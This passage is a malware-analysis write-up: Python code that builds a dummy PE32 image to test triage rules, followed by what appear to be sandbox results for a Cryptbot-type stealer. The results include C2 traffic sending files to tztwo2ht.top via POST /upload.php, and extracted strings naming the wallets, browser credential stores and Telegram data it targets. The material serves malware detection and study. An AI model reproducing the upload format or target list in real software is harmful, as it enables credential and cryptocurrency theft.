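    """Assemble a minimal PE32 file: DOS stub, PE signature, COFF header, 224-byte optional header
    (only the fields read above are filled in), section table, then raw data at FILE_ALIGN offsets."""
    e_lfanew = 0x80
    size_of_headers = -(-(e_lfanew + 4 + 20 + 224 + 40 * len(sections)) // FILE_ALIGN) * FILE_ALIGN
    dos = (b"MZ" + bytes(0x3A) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0x669035EF, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                                       # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)                                  # AddressOfEntryPoint
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, FILE_ALIGN)             # ImageBase, alignments
    struct.pack_into("<I", opt, 60, size_of_headers)
    table, body, raw_ptr = b"", b"", size_of_headers
    for name, vaddr, vsize, raw, chars in sections:
        padded = raw.ljust(-(-len(raw) // FILE_ALIGN) * FILE_ALIGN, b"\0")
        table += struct.pack("<8sIIIIIIHHI", name.encode(), vsize, vaddr, len(padded),
                             raw_ptr if padded else 0, 0, 0, 0, 0, chars)
        body += padded
        raw_ptr += len(padded)
    return (dos + b"PE\0\0" + coff + bytes(opt) + table).ljust(size_of_headers, b"\0") + body

def pseudo_random(n: int) -> bytes:
    """Deterministic high-entropy filler (SHA-256 counter stream) standing in for packed code."""
    return b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(-(-n // 32)))[:n]

# Section table copied from the report.  Assumptions: the raw data of .&ZK is truncated to 0x1000
# bytes and the other raw sections hold placeholder bytes, so entropies differ from the report's.
SAMPLE_SECTIONS = [
    (".text",  0x001000, 0x01B147, b"", CNT_CODE | MEM_EXECUTE | MEM_READ),
    (".rdata", 0x01D000, 0x00E47C, b"", CNT_INIT_DATA | MEM_READ),
    (".data",  0x02C000, 0x66AAF4, b"", CNT_INIT_DATA | MEM_READ | MEM_WRITE),
    (".WaG",   0x697000, 0x12A941, b"", CNT_CODE | MEM_EXECUTE | MEM_READ),
    (".[SL",   0x7C2000, 0x000450, bytes(0x440) + b"\x10\x20\x30\x40" * 4, CNT_INIT_DATA | MEM_READ | MEM_WRITE),
    (".&ZK",   0x7C3000, 0x1D9670, pseudo_random(0x1000), CNT_CODE | MEM_EXECUTE | MEM_READ),
    (".reloc", 0x99D000, 0x0004EC, b"\x00\x30" * 0x240, CNT_INIT_DATA | MEM_READ),
    (".rsrc",  0x99E000, 0x001569, bytes(0x1600), CNT_INIT_DATA | MEM_READ),
]
SAMPLE_PE = build_pe32(SAMPLE_SECTIONS, entry_rva=0x938580)   # entry point RVA from the report

if __name__ == "__main__":
    print(analyse(SAMPLE_PE)["findings"])
```

Run against a real file, `analyse(open(path, "rb").read())` returns the same structure; the four rules reproduce the report's static verdicts on the constructed image (entry point in .&ZK, special characters in .&ZK and .[SL, virtual-only .text and .WaG, high entropy in .&ZK). The raw-size-zero check is the one most worth keeping in a triage pipeline: a linker never emits an executable .text with no bytes on disk, so it is a stronger packer indicator than entropy alone, which compressed resources or embedded certificates also push up.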
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/13/24-19:08:46.717453 | TCP | 2856511 | ETPRO TROJAN Win32/CopperShrimp Stealer Related Activity (POST) | 49704 | 80 | 192.168.2.5 | 176.113.81.61
07/13/24-19:08:46.291207 | UDP | 2054383 | ET TROJAN Cryptbot CnC DGA Domain (two2) | 58241 | 53 | 192.168.2.5 | 1.1.1.1
07/13/24-19:08:46.717453 | TCP | 2054350 | ET TROJAN Win32/Cryptbotv2 CnC Activity (POST) M4 | 49704 | 80 | 192.168.2.5 | 176.113.81.61
Timestamp | Source -> Destination (TCP)
Jul 13, 2024 19:08:46.711736917 CEST | 192.168.2.5:49704 -> 176.113.81.61:80
Jul 13, 2024 19:08:46.717186928 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:46.717291117 CEST | 192.168.2.5:49704 -> 176.113.81.61:80
Jul 13, 2024 19:08:46.717453003 CEST | 192.168.2.5:49704 -> 176.113.81.61:80
Jul 13, 2024 19:08:46.717472076 CEST | 192.168.2.5:49704 -> 176.113.81.61:80
Jul 13, 2024 19:08:46.722346067 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:46.722553968 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:47.419622898 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:47.475049973 CEST | 192.168.2.5:49704 -> 176.113.81.61:80
Jul 13, 2024 19:08:50.289984941 CEST | 192.168.2.5:49704 -> 176.113.81.61:80
Jul 13, 2024 19:08:50.290041924 CEST | 192.168.2.5:49704 -> 176.113.81.61:80
Jul 13, 2024 19:08:50.295267105 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:50.295280933 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:50.295365095 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:50.512942076 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:50.568953991 CEST | 192.168.2.5:49704 -> 176.113.81.61:80
Jul 13, 2024 19:08:53.415340900 CEST | 192.168.2.5:49704 -> 176.113.81.61:80
Jul 13, 2024 19:08:53.415462017 CEST | 192.168.2.5:49704 -> 176.113.81.61:80
Jul 13, 2024 19:08:53.420490980 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.420531034 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.420563936 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.420578003 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.420581102 CEST | 192.168.2.5:49704 -> 176.113.81.61:80
Jul 13, 2024 19:08:53.420581102 CEST | 192.168.2.5:49704 -> 176.113.81.61:80
Jul 13, 2024 19:08:53.420593023 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.420619011 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.420622110 CEST | 192.168.2.5:49704 -> 176.113.81.61:80
Jul 13, 2024 19:08:53.420634031 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.420658112 CEST | 192.168.2.5:49704 -> 176.113.81.61:80
Jul 13, 2024 19:08:53.420660019 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.420716047 CEST | 192.168.2.5:49704 -> 176.113.81.61:80
Jul 13, 2024 19:08:53.421083927 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.421144962 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.421149969 CEST | 192.168.2.5:49704 -> 176.113.81.61:80
Jul 13, 2024 19:08:53.421192884 CEST | 192.168.2.5:49704 -> 176.113.81.61:80
Jul 13, 2024 19:08:53.425190926 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.425221920 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.425247908 CEST | 192.168.2.5:49704 -> 176.113.81.61:80
Jul 13, 2024 19:08:53.425291061 CEST | 192.168.2.5:49704 -> 176.113.81.61:80
Jul 13, 2024 19:08:53.425451040 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.425479889 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.425493002 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.425506115 CEST | 192.168.2.5:49704 -> 176.113.81.61:80
Jul 13, 2024 19:08:53.425517082 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.425525904 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.425537109 CEST | 192.168.2.5:49704 -> 176.113.81.61:80
Jul 13, 2024 19:08:53.425591946 CEST | 192.168.2.5:49704 -> 176.113.81.61:80
Jul 13, 2024 19:08:53.425659895 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.425733089 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.425733089 CEST | 192.168.2.5:49704 -> 176.113.81.61:80
Jul 13, 2024 19:08:53.425761938 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.425789118 CEST | 192.168.2.5:49704 -> 176.113.81.61:80
Jul 13, 2024 19:08:53.425846100 CEST | 192.168.2.5:49704 -> 176.113.81.61:80
Jul 13, 2024 19:08:53.425899029 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.425959110 CEST | 192.168.2.5:49704 -> 176.113.81.61:80
Jul 13, 2024 19:08:53.426409960 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.430296898 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.430305958 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.430417061 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.430504084 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.430752039 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.430761099 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.430767059 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.431149006 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.431256056 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.431263924 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.431271076 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.431286097 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.431293011 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.431299925 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.431309938 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.431322098 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.882766962 CEST | 176.113.81.61:80 -> 192.168.2.5:49704
Jul 13, 2024 19:08:53.928405046 CEST | 192.168.2.5:49704 -> 176.113.81.61:80
Jul 13, 2024 19:08:54.888317108 CEST | 192.168.2.5:49704 -> 176.113.81.61:80
Timestamp | Source -> Destination (UDP)
Jul 13, 2024 19:08:46.291207075 CEST | 192.168.2.5:58241 -> 1.1.1.1:53
Jul 13, 2024 19:08:46.705063105 CEST | 1.1.1.1:53 -> 192.168.2.5:58241
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 13, 2024 19:08:46.291207075 CEST | 192.168.2.5 | 1.1.1.1 | 0x8ac2 | Standard query (0) | tztwo2ht.top | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 13, 2024 19:08:46.705063105 CEST | 1.1.1.1 | 192.168.2.5 | 0x8ac2 | No error (0) | tztwo2ht.top | | 176.113.81.61 | A (IP address) | IN (0x0001) | false
        • tztwo2ht.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 176.113.81.61 | 80 | 3788 | C:\Users\user\Desktop\vk2wTOx91s.exe
Timestamp | Bytes transferred | Direction | Data
Jul 13, 2024 19:08:46.717453003 CEST | 328 | OUT | POST /upload.php HTTP/1.1
        Cache-Control: no-cache
        Connection: Keep-Alive
        Pragma: no-cache
        Content-Type: multipart/form-data; boundary=----Boundary77938395
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
        Content-Length: 348
        Host: tztwo2ht.top
Jul 13, 2024 19:08:46.717472076 CEST | 348 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 37 37 39 33 38 33 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4e 69 64
        Data Ascii: ------Boundary77938395Content-Disposition: form-data; name="file"; filename="Nidehaje.bin"Content-Type: application/octet-stream}tZX[aj@1:">4E2>`qU+RK{\B5a{=>nE8;
Jul 13, 2024 19:08:47.419622898 CEST | 190 | IN | HTTP/1.1 200 OK
        server: nginx/1.18.0 (Ubuntu)
        date: Sat, 13 Jul 2024 17:08:47 GMT
        content-type: text/plain; charset=utf-8
        content-length: 2
        etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
        Data Raw: 4f 4b
        Data Ascii: OK
Jul 13, 2024 19:08:50.289984941 CEST | 329 | OUT | POST /upload.php HTTP/1.1
        Cache-Control: no-cache
        Connection: Keep-Alive
        Pragma: no-cache
        Content-Type: multipart/form-data; boundary=----Boundary40876462
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
        Content-Length: 1424
        Host: tztwo2ht.top
Jul 13, 2024 19:08:50.290041924 CEST | 1424 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 34 30 38 37 36 34 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 61 6b
        Data Ascii: ------Boundary40876462Content-Disposition: form-data; name="file"; filename="Lakaki.bin"Content-Type: application/octet-streamswdUgMB1$TEg ,sYa`r _g`>|-!vU*ZRk{l1@|
Jul 13, 2024 19:08:50.512942076 CEST | 190 | IN | HTTP/1.1 200 OK
        server: nginx/1.18.0 (Ubuntu)
        date: Sat, 13 Jul 2024 17:08:50 GMT
        content-type: text/plain; charset=utf-8
        content-length: 2
        etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
        Data Raw: 4f 4b
        Data Ascii: OK
Jul 13, 2024 19:08:53.415340900 CEST | 330 | OUT | POST /upload.php HTTP/1.1
        Cache-Control: no-cache
        Connection: Keep-Alive
        Pragma: no-cache
        Content-Type: multipart/form-data; boundary=----Boundary86828523
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
        Content-Length: 79310
        Host: tztwo2ht.top
Jul 13, 2024 19:08:53.415462017 CEST | 13596 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 38 36 38 32 38 35 32 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 58 69 6d
        Data Ascii: ------Boundary86828523Content-Disposition: form-data; name="file"; filename="Ximuku.bin"Content-Type: application/octet-stream#YTjGWeGp7+u_$PjsAGW0t[("Jk+w(QKL?i{1l-/
Jul 13, 2024 19:08:53.420581102 CEST | 1236 | OUT | Data Raw: af 38 a1 73 22 c1 ac 8f 05 b3 fd 31 ba 40 36 98 c5 01 7d 75 ca c4 7c 74 6c 56 68 ee f5 80 23 b9 7d b2 e7 a5 32 30 0b 9e 9f b6 de 34 5a 46 17 43 b9 60 22 13 0f ff a1 2f 46 f0 4d f7 ac 2f ca e8 09 90 41 b4 12 ee ec 9d e3 24 db cf cb 3c f8 70 6f 45
        Data Ascii: 8s"1@6}u|tlVh#}204ZFC`"/FM/A$<poE8`!zZ'/?Ph&my,)qS{ojqL?j$<4n/pSM0B8>j|U~Y9T?bk5,>kr
Jul 13, 2024 19:08:53.420581102 CEST | 2472 | OUT | Data Raw: c3 11 12 8a b7 25 e2 6d f3 7a a5 c3 2e af 9b 5e 30 6b 98 a9 93 4d 97 ce 36 cd 78 ed 63 d1 22 4e 46 25 2e 5c 76 cc d6 57 24 8f 8b fc 47 bb 3c 2b de fe 20 8d 94 e7 9d 4d 59 b5 f5 23 bc 0e 4a b9 53 28 bc 00 0a 35 ca e2 96 4d 83 e3 97 a2 ea 78 62 b9
        Data Ascii: %mz.^0kM6xc"NF%.\vW$G<+ MY#JS(5MxbYF8Q3Z;"[3qgkEv2f8p&zEnyHsT;0OsiYG}\'3@U/M_!i5d9z-+tr
Jul 13, 2024 19:08:53.420622110 CEST | 2472 | OUT | Data Raw: 4c 5e cd 27 e7 4a ab 5b 8e 6f c8 37 5b a7 57 77 54 3d 42 be 75 72 6b 19 cf 03 d5 14 4f c2 bc 91 62 ee 77 20 6f 9c 12 dd 36 a6 77 c0 3e e0 76 e3 c7 23 89 4c 69 95 d3 d5 a8 aa 29 3a 41 c6 51 39 f6 7a 77 65 3f 18 de bf 7f 4d 4c 1d 54 1d ce 70 66 63
        Data Ascii: L^'J[o7[WwT=BurkObw o6w>v#Li):AQ9zwe?MLTpfcCgKx&B"%>j2c<4?I/h9sLPK4_8z!by}Dy~Yi#|0Su.@9]X)8
Jul 13, 2024 19:08:53.420658112 CEST | 7416 | OUT | Data Raw: db 50 7e fd 28 b6 65 8a bf 38 b6 67 a8 b4 ef bf 20 23 d0 1a 5a aa 40 45 87 f6 6d d2 e0 3a b5 46 62 16 47 09 0b 8b 4d b5 be c9 31 68 25 a6 0d 4a f1 d6 e5 8e 1b 2d 75 09 28 49 6d 18 4b 9c 03 c4 de de b9 97 b5 1a 65 64 fe e5 fb 46 fd d6 0a 64 11 1b
        Data Ascii: P~(e8g #Z@Em:FbGM1h%J-u(ImKedFdG-l$&f;(U$XjsH1RsL!cqKolk\cMG.?{I$Y_[3~)eYGT-'P-iO5U5Dpvm|!4:O
Jul 13, 2024 19:08:53.420716047 CEST | 4944 | OUT | Data Raw: 4e 55 77 75 57 dd 35 c7 8b d3 39 33 d0 13 e2 f0 1b ba 39 d6 b9 ec a0 19 39 8b 8e c1 50 63 1a 40 56 b8 ad 2a 38 f9 0c 96 6c c3 99 53 15 43 4e 04 d7 e1 cb 56 72 59 9e e5 51 6c be 6d 4a ad ea c4 00 65 c4 8a a6 b3 fe 78 36 79 33 01 63 18 0b a4 f3 a2
        Data Ascii: NUwuW59399Pc@V*8lSCNVrYQlmJex6y3c;m]Eqhh>|=b@] )ueyRpy K=pnW8bhF?UV4d puDb 7iPc,39xG(C@kFK^@BK+PMPf[i
Jul 13, 2024 19:08:53.421149969 CEST | 2472 | OUT | Data Raw: a7 4b 37 b7 30 6d 9b a8 23 34 c1 f0 83 3e de e1 6f 55 8a 11 b8 61 1a cc fd 6e c1 e9 a1 bb 17 ae da 0f 52 2f bf 92 70 1f 44 39 e2 ee 95 92 c3 41 4c 28 11 e7 0b 9f 01 2f 4c 30 05 f1 94 36 22 36 c5 fb 64 fd 42 f9 22 b2 bf 12 af 18 05 9f 20 6c 42 e7
        Data Ascii: K70m#4>oUanR/pD9AL(/L06"6dB" lBxNlN,yh|b*0037s+=+x^I$IFxR>1l[!O89;Riu`HKZc/' n\K(p#f
Jul 13, 2024 19:08:53.421192884 CEST | 2472 | OUT | Data Raw: 1c 43 d6 07 b2 89 94 d2 01 b1 9f ba 3f be da 78 98 fb 2f 0e 14 2b 28 a3 56 20 d3 a6 c6 b9 12 15 08 06 ce 67 64 8b c1 33 a2 81 d9 cf 77 22 8c 20 f9 6f e0 97 b9 6b ff fd 11 59 b1 46 76 6e 91 3f a5 2c 44 d3 36 48 3a 80 5e fe e6 4e c9 7c a4 db 8c b5
        Data Ascii: C?x/+(V gd3w" okYFvn?,D6H:^N|g(m@/-zxd/Dqj [5gW$p+h&.@q^Xhtc]]_30bWg%NQx.?lJDsRdqZ<$)E9Nw7X.~1R
        Jul 13, 2024 19:08:53.882766962 CEST 190 IN HTTP/1.1 200 OK
        server: nginx/1.18.0 (Ubuntu)
        date: Sat, 13 Jul 2024 17:08:53 GMT
        content-type: text/plain; charset=utf-8
        content-length: 2
        etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
        Data Raw: 4f 4b
        Data Ascii: OK


        Target ID: 0
        Start time: 13:08:42
        Start date: 13/07/2024
        Path: C:\Users\user\Desktop\vk2wTOx91s.exe
        Wow64 process (32bit): true
        Commandline: "C:\Users\user\Desktop\vk2wTOx91s.exe"
        Imagebase: 0x50000
        File size: 1'949'184 bytes
        MD5 hash: 2FBF1FC802AC4B340B1FD7B3E4659974
        Has elevated privileges: true
        Has administrator privileges: true
        Programmed in: C, C++ or other language
        Reputation: low
        Has exited: true


          Execution Graph

          Execution Coverage: 6.1%
          Dynamic/Decrypted Code Coverage: 0%
          Signature Coverage: 16.3%
          Total number of Nodes: 496
          Total number of Limit Nodes: 55
          APIs
          • FindFirstFileW.KERNELBASE(?,?,7D5DF9B0,00000000,00000000,00000001), ref: 000590FD
          • FindNextFileW.KERNELBASE(00000000,?), ref: 00059D59
          • FindClose.KERNELBASE(00000000), ref: 00059D71
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: Find$File$CloseFirstNext
          • String ID: Bitcoin$Dash$Dogecoin$Ethereum (UTC)$Exodus Eden$Jaxx$Ledger Live$Litecoin$Local State$Login Data$Opera$Opera Beta$Opera Crypto$Opera Developer$Opera GX$Opera Software\Opera Crypto Stable$Opera Software\Opera Developer$Opera Software\Opera GX Stable$Opera Software\Opera Next$Opera Software\Opera Stable$Opera Unknown$Telegram$UTC--2$Unknown$\Desktop$\Local Extension Settings$\Opera Software\$\Profiles\$\User Data\$com.liberty.jaxx$cookies.sqlite$tdata
          • API String ID: 3541575487-1430340477
          • Opcode ID: 6571cdbd74c24273f05dedc7b1e8df8c17f134a37c760a57b51c44234464d256
          • Instruction ID: 8cbd3f52f4282a9a857ef1fd2ff4f7073ed049c4c0e2595c5793882b891f59fb
          • Opcode Fuzzy Hash: 6571cdbd74c24273f05dedc7b1e8df8c17f134a37c760a57b51c44234464d256
          • Instruction Fuzzy Hash: BF728C7490025ACADB64DB24C851BFAB3B5EF00345F54C1E9DC095B285EF788ECACBA5

          Control-flow Graph

          APIs
          • Sleep.KERNELBASE(000007D0), ref: 0005F4F4
          Strings
          • aeiou, xrefs: 0005F042
          • oSabnN, xrefs: 0005F100, 0005F127
          • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36, xrefs: 0005F503
          • ------Boundary%luContent-Disposition: form-data; name="file"; filename="%s.bin"Content-Type: application/octet-stream, xrefs: 0005F2F1
          • ------Boundary%lu--, xrefs: 0005F314
          • Content-Type: multipart/form-data; boundary=----Boundary%lu, xrefs: 0005F337
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: Sleep
          • String ID: ------Boundary%lu--$------Boundary%luContent-Disposition: form-data; name="file"; filename="%s.bin"Content-Type: application/octet-stream$Content-Type: multipart/form-data; boundary=----Boundary%lu$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36$aeiou$oSabnN
          • API String ID: 3472027048-2317773314
          • Opcode ID: 4109d8752440e91452d4b529e95c2ded1d10b3fd4c65411225332647173b1ba4
          • Instruction ID: 4507a938b5e0fcf04a36145894a30fadec5e06c9bb34a0e81f9534a45e5f959c
          • Opcode Fuzzy Hash: 4109d8752440e91452d4b529e95c2ded1d10b3fd4c65411225332647173b1ba4
          • Instruction Fuzzy Hash: 3122EA30A0425A9BDB619F64CC507FFBBF5AF49301F1441F9E849A7382DA389E898F50
          APIs
          • GetTimeZoneInformation.KERNELBASE(?), ref: 0005D3DD
          Strings
          • %02d.%02d.%4d (%02d:%02d:%02d) UTC: %wS%02d:%02d %wS, xrefs: 0005D51F
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: InformationTimeZone
          • String ID: %02d.%02d.%4d (%02d:%02d:%02d) UTC: %wS%02d:%02d %wS
          • API String ID: 565725191-1913787606
          • Opcode ID: a4f5ad5058cb40ce12dd93e87f0872bd8adf837f7876831854d0c86f85748c9c
          • Instruction ID: dd5aa793e6ab82d75b0d086dc641e47e5602db4e6f93f3e0ac073514078fc7c2
          • Opcode Fuzzy Hash: a4f5ad5058cb40ce12dd93e87f0872bd8adf837f7876831854d0c86f85748c9c
